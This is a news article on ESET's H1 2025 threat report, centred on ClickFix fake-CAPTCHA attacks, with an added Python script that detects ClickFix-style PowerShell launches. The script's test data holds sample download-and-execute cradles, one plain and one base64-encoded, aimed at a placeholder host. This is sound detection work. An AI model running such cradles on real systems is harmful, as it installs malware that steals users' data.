- ClickFix is increasingly used to install infostealers
- The attack vector saw a 500% increase in the last six months
- Users are told to run commands in PowerShell to "fix" an error
Use of the ClickFix attack vector has risen 517% since the second half of 2024, making it the second most abused attack vector behind phishing.
The attack uses a fake reCAPTCHA to trick users into running code in a PowerShell terminal as the "solution" to a fake error.
This downloads and executes malware, typically infostealers, on the target device, which then harvest confidential data and exfiltrate it to the attackers.
Infostealers on the rise
ESET's H1 2025 Threat Report explains how attackers abuse ClickFix to distribute some of the most widespread infostealers, including Lumma Stealer, Vidar Stealer, StealC and DanaBot.
The attack vector is so effective because it relies on very simple instructions to trick users into running complex commands in the PowerShell terminal. Many users will simply ignore or not understand the commands they are running, focusing instead on trying to fix the error.
ClickFix is generally distributed through phishing emails that direct the user to a fake website which demands a reCAPTCHA verification before granting access. PowerShell commands often evade antivirus software, so this is a particularly effective way to compromise devices, especially when the attacker can get the user to run the command for them: the payload is launched from the user's own interactive session, so neither the email gateway nor the browser ever sees a malicious file.
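The behavioural tell of a ClickFix infection described above is a PowerShell process launched by the user's own interactive shell (explorer.exe, which backs both the Win+R Run box and the Start menu) carrying a download-and-execute cradle, frequently hidden behind -EncodedCommand and window-hiding switches. The following is an added example of triage logic over such process-creation events; it is not ESET's detection logic and not code from the report. It assumes Sysmon Event ID 1 (or Windows 4688) events already flattened into dicts with "parent", "image" and "cmdline" keys; the sample events, the example.invalid URLs and the CcmExec.exe parent are constructed for illustration.

```python
"""Heuristic triage of process-creation events for ClickFix-style PowerShell launches.

Added example, not ESET's detection logic. Assumes events are dicts with
"parent", "image" and "cmdline" keys (e.g. flattened Sysmon Event ID 1).
"""
import base64
import re
from typing import Optional

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Parents that mean a human typed or pasted the command: Win+R and the Start
# menu both launch through explorer.exe; cmd.exe covers a pasted terminal session.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}

# Download-and-execute cradle indicators (matched case-insensitively).
CRADLE_PATTERNS = [
    r"\biex\b", r"invoke-expression", r"downloadstring", r"downloadfile",
    r"\biwr\b", r"invoke-webrequest", r"\bcurl\b", r"frombase64string",
    r"start-bitstransfer", r"\bmshta\b", r"https?://",
]
# Switches that hide the window or silence the session (informational only).
EVASION_PATTERNS = [
    r"-w(?:indowstyle)?\s+hidden", r"-nop(?:rofile)?\b",
    r"-noni(?:nteractive)?\b", r"-e(?:xecutionpolicy|p)\s+bypass",
]
# PowerShell accepts -e, -ec, -en, -enc and -EncodedCommand; the payload is
# base64 of UTF-16LE text. "-ep bypass" must not match, hence the explicit group.
ENCODED_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> dict:
    """Classify one process-creation event and explain why."""
    result = {"candidate": False, "reasons": [], "decoded": None}
    if _basename(event["image"]) not in POWERSHELL_IMAGES:
        return result
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    result["decoded"] = decoded
    # Match indicators against the visible command line and the decoded payload.
    haystack = cmdline if decoded is None else cmdline + " " + decoded
    parent = _basename(event["parent"])
    interactive = parent in INTERACTIVE_PARENTS
    cradle = [p for p in CRADLE_PATTERNS if re.search(p, haystack, re.I)]
    evasion = [p for p in EVASION_PATTERNS if re.search(p, haystack, re.I)]
    if interactive:
        result["reasons"].append("launched from interactive shell " + parent)
    if decoded is not None:
        result["reasons"].append("encoded command decoded")
    if cradle:
        result["reasons"].append(f"download/execute cradle ({len(cradle)} indicators)")
    if evasion:
        result["reasons"].append(f"evasion switches ({len(evasion)})")
    # Core rule: a human-launched PowerShell that fetches and runs remote code.
    # Evasion switches alone are not enough; admin tooling uses -ExecutionPolicy Bypass.
    result["candidate"] = interactive and bool(cradle)
    return result


def triage(events: list) -> list:
    """Indexes of events that look like a pasted ClickFix command."""
    return [i for i, ev in enumerate(events) if analyze(ev)["candidate"]]


# Constructed sample events (not from any real incident).
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/b')".encode("utf-16-le")
).decode("ascii")
SAMPLE_EVENTS = [
    # Fake CAPTCHA: the user pasted a visible cradle into the Run box.
    {"parent": r"C:\Windows\explorer.exe", "image": _PS,
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/x.txt -UseBasicParsing | iex"'},
    # Same attack, cradle hidden behind -EncodedCommand.
    {"parent": r"C:\Windows\explorer.exe", "image": _PS,
     "cmdline": f"powershell -nop -enc {_ENCODED}"},
    # Benign: a management agent running a local script with a bypassed policy.
    {"parent": r"C:\Windows\CCM\CcmExec.exe", "image": _PS,
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\ProgramData\inventory.ps1"},
    # Benign: the user opened an interactive PowerShell window.
    {"parent": r"C:\Windows\explorer.exe", "image": _PS, "cmdline": "powershell.exe"},
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        r = analyze(ev)
        print(i, "ALERT" if r["candidate"] else "ok", "; ".join(r["reasons"]))
```

The rule deliberately requires both an interactive parent and a cradle: flagging every -ExecutionPolicy Bypass or hidden window would drown the alert in legitimate administration scripts, while a user-pasted PowerShell that fetches remote code is rare enough in normal environments to be worth an analyst's time. Decoding -EncodedCommand before matching is what keeps the second sample from slipping through.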
In other infostealer news, the ESET threat report shows that SnakeStealer has surpassed Agent Tesla as the most detected infostealer. SnakeStealer was seen in a massive credential-theft campaign targeting hundreds of companies in the US and the EU.
Ransomware gangs experienced an unexpectedly tumultuous period thanks to internal struggles and rivalries between the different ransomware outfits. The DragonForce group launched a wave of defacement campaigns against some of the most infamous ransomware groups, including BlackLock, Mamona and the RansomHub ransomware-as-a-service operation.
Although there have been significant law enforcement operations against ransomware groups in recent months, including the 8Base seizure, it seems that rivalries have done the greatest damage to the ransomware ecosystem.
On the mobile front, the recent series of Kaleidoscope infections has raised Android adware detections by 160%. Malware distributed through official app stores is nothing new, with the recent SparkKitty malware distributed via the Apple App Store and Google Play Store.
However, the Kaleidoscope malware used a two-pronged approach: it runs intrusive ads on the target device to generate advertising revenue, while also infecting target devices with a malicious twin app downloaded through a third-party app store.
"From new social engineering techniques to sophisticated mobile threats and significant infostealer disruptions, the threat landscape in the first half of 2025 was anything but boring," said Jiří Kropáč, Director of Threat Prevention Labs at ESET.